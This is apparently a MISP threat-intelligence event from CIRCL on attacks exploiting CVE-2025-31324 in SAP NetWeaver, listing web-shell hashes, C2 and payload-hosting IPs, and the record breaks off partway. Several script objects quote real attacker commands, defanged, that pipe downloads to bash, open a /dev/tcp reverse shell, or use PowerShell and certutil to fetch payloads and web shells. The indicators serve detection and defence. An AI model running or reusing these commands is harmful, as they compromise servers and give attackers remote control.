{
  "Event": {
    "analysis": "2",
    "date": "2025-05-12",
    "extends_uuid": "",
    "info": "OSINT - Threat Brief: CVE-2025-31324",
    "publish_timestamp": "1747036254",
    "published": true,
    "threat_level_id": "3",
    "timestamp": "1747036234",
    "uuid": "1f97d8d7-3cbf-406f-b56e-da6876290656",
    "Orgc": {
      "name": "CIRCL",
      "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
    },
    "Tag": [
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:producer=\"Palo Alto\"",
        "relationship_type": ""
      },
      {
        "colour": "#004646",
        "local": false,
        "name": "type:OSINT",
        "relationship_type": ""
      },
      {
        "colour": "#0071c3",
        "local": false,
        "name": "osint:lifetime=\"perpetual\"",
        "relationship_type": ""
      },
      {
        "colour": "#0087e8",
        "local": false,
        "name": "osint:certainty=\"50\"",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:white",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:clear",
        "relationship_type": ""
      }
    ],
    "Attribute": [
      {
        "category": "Payload delivery",
        "comment": "Suspected web shell",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034241",
        "to_ids": true,
        "type": "sha256",
        "uuid": "445c7627-434e-440b-9d5d-132027096d17",
        "value": "b9ef95ca541d3e05a6285411005f5fee15495251041f78e715234b09d019b92c"
      },
      {
        "category": "Payload delivery",
        "comment": "Suspected web shell",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034241",
        "to_ids": true,
        "type": "sha256",
        "uuid": "3bb1ea69-7ca1-471c-a965-bb55babcb9f1",
        "value": "1abf922a8228fd439a72cfddf1ed08ea09b59eaa4ae5eeba1d322d5f3e3c97e8"
      },
      {
        "category": "Payload delivery",
        "comment": "Suspected web shell",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034241",
        "to_ids": true,
        "type": "sha256",
        "uuid": "db741409-11cd-4119-abfd-146a0379d42a",
        "value": "2e6f348f8296f4e062c397d2f3708ca6fdeab2c71edfd130b2ca4c935e53c0d3"
      },
      {
        "category": "Payload delivery",
        "comment": "Suspected web shell",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034241",
        "to_ids": true,
        "type": "sha256",
        "uuid": "427f7b6f-249d-40f0-b6c6-6bd6426a7150",
        "value": "6c6c984727dc53af110ed08ec8b15092facb924c8ad62e86ec76b52a00a41a40"
      },
      {
        "category": "Payload delivery",
        "comment": "Suspected web shell",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034241",
        "to_ids": true,
        "type": "sha256",
        "uuid": "f908d816-3ae0-4630-a2b8-ab9166425447",
        "value": "4b17beee8c2d94cf8e40efc100651d70d046f5c14a027cf97d845dc839e423f9"
      },
      {
        "category": "Payload delivery",
        "comment": "Suspected web shell",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034241",
        "to_ids": true,
        "type": "sha256",
        "uuid": "fade5fbd-80f8-4d2a-904f-a7c93ccd608a",
        "value": "7aab6ec707988ff3eec37f670b6bb0e0ddd02cc0093ead78eb714abded4d4a79"
      },
      {
        "category": "Payload delivery",
        "comment": "Suspected web shell",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034241",
        "to_ids": true,
        "type": "sha256",
        "uuid": "1176e959-487b-4674-acc5-ec15735c4abf",
        "value": "b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee"
      },
      {
        "category": "Payload delivery",
        "comment": "JSP web shell named ran.jsp",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034255",
        "to_ids": true,
        "type": "sha256",
        "uuid": "f3d44847-c29e-4ee9-9798-3208c30955b8",
        "value": "69bb809b3fee09ed3ec9138f7566cc867bd6f1e8949b5e3daff21d451c533d75"
      },
      {
        "category": "Payload delivery",
        "comment": "Base64-encoded PowerShell Script downloaded from d-69b.pages[.]dev named sshb64.ps1 that creates reverse SSH SOCKS proxy",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034274",
        "to_ids": true,
        "type": "sha256",
        "uuid": "797c470a-9b1d-46fa-905d-9f7e8e076dbe",
        "value": "427877aadd89f427e1815007998d9bb88309c548951a92a6e4064df001e327c2"
      },
      {
        "category": "Payload delivery",
        "comment": "Payload downloaded from 65.49.235[.]210 named 2.jpg",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034292",
        "to_ids": true,
        "type": "sha256",
        "uuid": "7d9874e6-1479-497a-9f4e-05b30dabe3e2",
        "value": "5a8ddc779dcf124fe5692d15be44346fb6d742322acb0eb3c6b4e90f581c5f9e"
      },
      {
        "category": "Payload delivery",
        "comment": "Batch script that attempts to download GOREVERSE and executes it",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034310",
        "to_ids": true,
        "type": "sha256",
        "uuid": "e2d68717-0b94-4a5e-ba6f-09b86887087a",
        "value": "5919f2eab8a826d7ba84e6c413626f5d11ed412d7df0d3ab864f31d3a8db3763"
      },
      {
        "category": "Payload delivery",
        "comment": "GOREVERSE reverse shell, named config",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034325",
        "to_ids": true,
        "type": "sha256",
        "uuid": "7a358646-3afc-495d-9dd3-76c348ce1291",
        "value": "888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef"
      },
      {
        "category": "Payload delivery",
        "comment": "JSP webshell named helper.jsp and usage.jsp",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034346",
        "to_ids": true,
        "type": "sha256",
        "uuid": "38de39ed-f01a-4800-8777-4610535b35cc",
        "value": "598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0"
      },
      {
        "category": "Payload delivery",
        "comment": "Batch file downloaded from 101.32.26[.]154 named ansgdhs.bat",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034384",
        "to_ids": true,
        "type": "sha256",
        "uuid": "8b857b89-cde6-4594-9dc6-73fd86528b15",
        "value": "3f5fd4b23126cb21d1007b479954af619a16b0963a51f45cc32a8611e8e845b5"
      },
      {
        "category": "Payload delivery",
        "comment": "Downloaded by ansgdhs.bat named wbemcomn.dll this suspicious file is downloaded from 101.32.26[.]154 and is possibly side-loaded",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034418",
        "to_ids": true,
        "type": "sha256",
        "uuid": "3df3fe95-6a1e-49d2-8b1f-99766b41ce94",
        "value": "c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28"
      },
      {
        "category": "Payload delivery",
        "comment": "Downloaded by ansgdhs.bat named 0g9pglZr74.ini. This suspicious file is downloaded from 101.32.26[.]15.",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034437",
        "to_ids": true,
        "type": "sha256",
        "uuid": "09bf3bc1-fdda-416b-a350-459725439edc",
        "value": "9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d"
      },
      {
        "category": "Payload delivery",
        "comment": "Downloaded from 101.32.26[.]15 named shell.jsp",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034456",
        "to_ids": true,
        "type": "sha256",
        "uuid": "809ef9f0-4ec0-4cfa-9c8e-d6b7faafa33e",
        "value": "df492597eb412c94155a7f437f593aed89cfec2f1f149eb65174c6201be69049"
      },
      {
        "category": "External analysis",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034547",
        "to_ids": false,
        "type": "vulnerability",
        "uuid": "5e8b6297-164d-42a2-9641-425b186bf2ef",
        "value": "CVE-2025-31324"
      },
      {
        "category": "Network activity",
        "comment": "Tested exploit in January 2025",
        "deleted": false,
        "disable_correlation": false,
        "first_seen": "2025-01-01T00:00:00+00:00",
        "last_seen": "2025-01-01T00:00:00+00:00",
        "timestamp": "1747034636",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "83b1028f-be00-4522-b755-a1659345386f",
        "value": "205.169.39.55"
      },
      {
        "category": "Network activity",
        "comment": "Exploited vulnerability and deployed web shells in March 2025",
        "deleted": false,
        "disable_correlation": false,
        "first_seen": "2025-03-01T00:00:00+00:00",
        "last_seen": "2025-03-01T00:00:00+00:00",
        "timestamp": "1747034671",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "62ef3a6a-f5c0-4943-9891-03e42c96f94f",
        "value": "206.188.197.52"
      },
      {
        "category": "Network activity",
        "comment": "Hosting suspicious payload",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034732",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "ef6d7213-bc89-4d32-aa01-b4c83ceabbe7",
        "value": "65.49.235.210"
      },
      {
        "category": "Network activity",
        "comment": "Hosting suspicious payload",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034797",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "580dce67-37a1-4d67-88b7-e15e0d96f31d",
        "value": "108.171.195.163"
      },
      {
        "category": "Network activity",
        "comment": "GOREVERSE C2",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034812",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "26ba2dc0-d1ca-42a1-b6f1-276bd2c5ed5e",
        "value": "47.97.42.177"
      },
      {
        "category": "Network activity",
        "comment": "Reverse SSH SOCKS proxy C2",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034829",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "d45d51ac-c1c1-46aa-b8e2-d91ac3549cc7",
        "value": "45.76.93.60"
      },
      {
        "category": "Network activity",
        "comment": "Hosting suspicious payload",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034847",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "25675ca7-04b9-412e-aa2d-317983b6c201",
        "value": "158.247.224.100"
      },
      {
        "category": "Network activity",
        "comment": "Hosting suspicious payload",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034865",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "e1c73379-7a82-41b8-91ae-9ba1fb8023c2",
        "value": "31.192.107.157"
      },
      {
        "category": "Network activity",
        "comment": "Attempted GET requests against several already reported web shell names",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034884",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "a629171d-3c61-4cf7-9bc5-851756f728b4",
        "value": "107.173.135.116"
      },
      {
        "category": "Network activity",
        "comment": "Attempted GET requests against several already reported web shell names to download reported Supershell malware from the domain overseas-recognized-athens-oakland[.]trycloudflare",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034908",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "9021fdb9-54c0-4568-8550-bf8df7e22515",
        "value": "192.3.153.18"
      },
      {
        "category": "Network activity",
        "comment": "Attempted GET requests against several already reported web shell names",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747034926",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "1033e8e5-f971-4be1-a2a4-f21ed8ac2d2c",
        "value": "188.166.87.88"
      },
      {
        "category": "Network activity",
        "comment": "Attempted GET requests against several already reported web shell names",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747035010",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "0c339c22-359e-4df7-bb9b-b20b35ab4d2d",
        "value": "223.184.254.150"
      },
      {
        "category": "Network activity",
        "comment": "Attempted GET requests against several already reported web shell names",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747035027",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "8d9c9220-59f5-4322-a725-ed69ce5e041e",
        "value": "51.79.66.183"
      },
      {
        "category": "Network activity",
        "comment": "Attempted GET requests against the helper.jsp web shell to download and execute a bash command from 138.68.61[.]82",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747035043",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "ae7dc80d-24e6-4831-980c-6bf2998a7169",
        "value": "85.106.113.168"
      },
      {
        "category": "Network activity",
        "comment": "Reverse shell C2",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747035072",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "85bfa39b-f637-4037-9024-c456b87a2d70",
        "value": "138.68.61.82"
      },
      {
        "category": "Network activity",
        "comment": "Attempted GET requests against several already reported web shell names",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747035089",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "c53076b0-88fc-472e-9630-22d16ba7e81c",
        "value": "101.99.91.107"
      },
      {
        "category": "Network activity",
        "comment": "Attempted GET requests against several already reported web shell names",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747035106",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "11ee111d-7790-48ec-9a97-f2d5fc595888",
        "value": "103.207.14.195"
      },
      {
        "category": "Network activity",
        "comment": "Attempted GET requests against several already reported web shell names",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747035123",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "bf4b7e36-bbd4-4620-99a3-f42bd2682c1a",
        "value": "13.232.191.219"
      },
      {
        "category": "Network activity",
        "comment": "Hosted GOREVERSE payload",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747035192",
        "to_ids": true,
        "type": "hostname",
        "uuid": "04190a03-5f57-46b1-ac2f-d5dfe7d510c5",
        "value": "ocr-freespace.oss-cn-beijing.aliyuncs.com"
      },
      {
        "category": "Network activity",
        "comment": "Hosted reported SUPERSHELL payload",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1747035207",
        "to_ids": true,
        "type": "hostname",
        "uuid": "b75851f6-3e72-4219-9df9-8b640c2b11b5",
        "value": "overseas-recognized-athens-oakland.trycloudflare.com"
      }
    ],
    "Object": [
      {
        "comment": "CVE-2025-31324: Enriched via the vulnerability_lookup module",
        "deleted": false,
        "description": "Vulnerability object describing a common vulnerability enumeration which can describe published, unpublished, under review or embargo vulnerability for software, equipments or hardware.",
        "meta-category": "vulnerability",
        "name": "vulnerability",
        "template_uuid": "81650945-f186-437b-8945-9f31715d32da",
        "template_version": "8",
        "timestamp": "1747034579",
        "uuid": "24a92cc0-f995-403c-89f3-d2697d64fc9f",
        "ObjectReference": [
          {
            "comment": "",
            "object_uuid": "24a92cc0-f995-403c-89f3-d2697d64fc9f",
            "referenced_uuid": "5e8b6297-164d-42a2-9641-425b186bf2ef",
            "relationship_type": "related-to",
            "timestamp": "1747034556",
            "uuid": "7827d858-518f-4957-aca2-88f14b0dd8e7"
          }
        ],
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "id",
            "timestamp": "1747034579",
            "to_ids": false,
            "type": "vulnerability",
            "uuid": "d6f2f0fe-f5ae-4573-9460-25a5f59ed25b",
            "value": "CVE-2025-31324"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "published",
            "timestamp": "1747034579",
            "to_ids": false,
            "type": "datetime",
            "uuid": "4d5edd00-d21f-4d87-a626-37a4c9b18858",
            "value": "2025-04-24T16:50:27.706000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "modified",
            "timestamp": "1747034579",
            "to_ids": false,
            "type": "datetime",
            "uuid": "9972534e-3926-4e4b-b3a7-5685cae5d5b5",
            "value": "2025-05-02T17:13:30.650000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747034579",
            "to_ids": false,
            "type": "text",
            "uuid": "2cd024f5-bd04-4ecc-b1a4-22ea65b1ca82",
            "value": "PUBLISHED"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1747034579",
            "to_ids": false,
            "type": "link",
            "uuid": "cf3df0a8-b9ff-4c59-bcc8-1227570c45d9",
            "value": "https://me.sap.com/notes/3594142"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1747034579",
            "to_ids": false,
            "type": "link",
            "uuid": "0423daa5-273a-4439-be8a-b2a974fde780",
            "value": "https://url.sap/sapsecuritypatchday"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "description",
            "timestamp": "1747034579",
            "to_ids": false,
            "type": "text",
            "uuid": "677d3185-b618-4ac3-b104-bfcf76dbfa09",
            "value": "SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system."
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "7",
        "timestamp": "1747035351",
        "uuid": "82477a33-737f-4cee-8487-1f0d02e38c2c",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1747035351",
            "to_ids": false,
            "type": "text",
            "uuid": "f347bd95-956f-4a70-8f34-3a283edf4b91",
            "value": "curl 138.68.61[.]82|bash"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1747035351",
            "to_ids": false,
            "type": "text",
            "uuid": "ae1b6a65-1e41-44d4-b890-1030b025e81f",
            "value": "Bash"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "comment",
            "timestamp": "1747035351",
            "to_ids": false,
            "type": "text",
            "uuid": "19981022-7b90-41f2-9092-c85dfa1742e9",
            "value": "Downloads and executes this command bash -i >& /dev/tcp/138.68.61[.]82/4544 0>&1"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747035351",
            "to_ids": false,
            "type": "text",
            "uuid": "14583f44-6c3c-4d24-96e6-9d52b5b9f9d1",
            "value": "Malicious"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "7",
        "timestamp": "1747035434",
        "uuid": "4df6df44-32df-4306-ac40-1cbcd30ad508",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1747035434",
            "to_ids": false,
            "type": "text",
            "uuid": "625e0190-d63a-4ef5-9fda-de34b86e5e01",
            "value": "bash -i >& /dev/tcp/138.68.61[.]82/4544 0>&1"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1747035434",
            "to_ids": false,
            "type": "text",
            "uuid": "15ed2a7b-b2c8-4aec-9657-786fe22d3728",
            "value": "Bash"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "comment",
            "timestamp": "1747035434",
            "to_ids": false,
            "type": "text",
            "uuid": "9c8c79d3-769c-412d-9bae-1ea443e3dac0",
            "value": "Establishes reverse shell from a compromised SAP server"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747035434",
            "to_ids": false,
            "type": "text",
            "uuid": "9f1dac7b-ddb5-41fc-8c13-674fefc0e854",
            "value": "Malicious"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "7",
        "timestamp": "1747035468",
        "uuid": "b84c7ff4-fc8e-4df5-8be2-df9d9e5f3690",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1747035468",
            "to_ids": false,
            "type": "text",
            "uuid": "b22249c9-ab3f-4d46-a873-7e17f1baef10",
            "value": "curl -sk hxxps://overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js || wget --no-check-certificate -q -O - hxxps://overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js) | bash -sh"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1747035468",
            "to_ids": false,
            "type": "text",
            "uuid": "806d32c3-e1b2-4a0d-88fa-15908de7608f",
            "value": "Bash"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "comment",
            "timestamp": "1747035468",
            "to_ids": false,
            "type": "text",
            "uuid": "bb469a9b-62ee-4756-b417-2173974b99da",
            "value": "Attempted to download reported SUPERSHELL payload"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747035468",
            "to_ids": false,
            "type": "text",
            "uuid": "699f645f-2725-4f15-b20d-7ff14fd43d39",
            "value": "Malicious"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "7",
        "timestamp": "1747035490",
        "uuid": "51b43b80-f1fa-4e9b-8ef6-b4458b9f0a4c",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1747035490",
            "to_ids": false,
            "type": "text",
            "uuid": "ffc5c882-0bc2-42d8-86c0-27dc7865b5f4",
            "value": "powershell Invoke-WebRequest -Uri \"hxxp://31.192.107[.]157:38205/ReportQueue.exe\" -OutFile \"%ALLUSERSPROFILE%\\ReportQueue.exe\""
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1747035490",
            "to_ids": false,
            "type": "text",
            "uuid": "391c4e05-1ed7-4e80-9351-7543f24047a7",
            "value": "Bash"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747035490",
            "to_ids": false,
            "type": "text",
            "uuid": "ec059ddb-09af-4f7f-8809-d49800a9cd66",
            "value": "Malicious"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "7",
        "timestamp": "1747035514",
        "uuid": "c03bc2f6-55c7-4d7f-9ffb-667e8caf453f",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1747035514",
            "to_ids": false,
            "type": "text",
            "uuid": "21f20e94-899f-4363-9f4e-5a0941844ed7",
            "value": "powershell Invoke-WebRequest -Uri \"hxxp://158.247.224[.]100:38205/EACA38DB.tmp\" -OutFile \"%ALLUSERSPROFILE%\\EACA38DB.tmp\""
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1747035514",
            "to_ids": false,
            "type": "text",
            "uuid": "93d79375-9842-4475-820a-cd367901f28b",
            "value": "Bash"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747035514",
            "to_ids": false,
            "type": "text",
            "uuid": "37194b2e-f5c6-40c4-86b2-d4681193d720",
            "value": "Malicious"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "7",
        "timestamp": "1747035544",
        "uuid": "242b4ea9-e54b-4b42-984e-b10ed65e9f18",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1747035544",
            "to_ids": false,
            "type": "text",
            "uuid": "c46bdc28-ad9c-4807-bdf0-38356cc2bfb6",
            "value": "powershell curl -o \"%PUBLIC%\\ansgdhs.bat\" hxxp://101.32.26[.]154/rymhNszS/ansgdhs.bat"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1747035544",
            "to_ids": false,
            "type": "text",
            "uuid": "558d80b2-941f-4652-ad22-9e06425408ff",
            "value": "PowerShell"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747035544",
            "to_ids": false,
            "type": "text",
            "uuid": "8f48edb4-0dc2-49a8-a943-5c4dde5c2bc5",
            "value": "Malicious"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "7",
        "timestamp": "1747035758",
        "uuid": "bc2d3efe-3660-4baa-b438-a31edd487530",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1747035758",
            "to_ids": false,
            "type": "text",
            "uuid": "acd6d20c-f89e-4a32-80d7-893168a18c71",
            "value": "powershell IEX(New-Object Net.WebClient).DownloadString('hxxps://d-69b.pages[.]dev/sshb64.ps1')"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1747035758",
            "to_ids": false,
            "type": "text",
            "uuid": "cf20aee2-e738-4e02-a53c-aeae28c912e5",
            "value": "PowerShell"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747035758",
            "to_ids": false,
            "type": "text",
            "uuid": "9d316884-8d8f-43c6-ae61-877475b1f8d7",
            "value": "Malicious"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "7",
        "timestamp": "1747035795",
        "uuid": "615b7fab-6d6b-4f04-bca3-9e82f091aa0c",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1747035795",
            "to_ids": false,
            "type": "text",
            "uuid": "f24d7196-deda-4114-91e9-c7e48d18d0d7",
            "value": "certutil.exe -urlcache -split -f hxxp://108.171.195[.]163:8000/$FILE_NAME$.txt ~\\sap.com\\irj\\servlet_jsp\\irj\\root\\Logout.jsp"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1747035795",
            "to_ids": false,
            "type": "text",
            "uuid": "c815b24a-d3a5-4935-a0ba-c48691e72cf1",
            "value": "PowerShell"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747035795",
            "to_ids": false,
            "type": "text",
            "uuid": "01fb2974-483f-4427-bd43-2367f5c2e80a",
            "value": "Malicious"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "7",
        "timestamp": "1747035813",
        "uuid": "6376d252-624f-42ef-8f60-07696e2a4009",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1747035813",
            "to_ids": false,
            "type": "text",
            "uuid": "98b51a11-551e-43ad-b2fb-b77e823e352e",
            "value": "powershell (new-object Net.WebClient).DownloadFile('hxxp://108.171.195[.]163:8000/$FILE_NAME$.txt ,'~\\sap.com\\irj\\servlet_jsp\\irj\\root\\Logout.jsp')"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1747035813",
            "to_ids": false,
            "type": "text",
            "uuid": "567cf7d0-f4cc-440b-95ed-3e767a8b0810",
            "value": "PowerShell"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747035813",
            "to_ids": false,
            "type": "text",
            "uuid": "28149f4d-a06a-4c93-9e1b-d458ce6d5ad1",
            "value": "Malicious"
          }
        ]
      },
      {
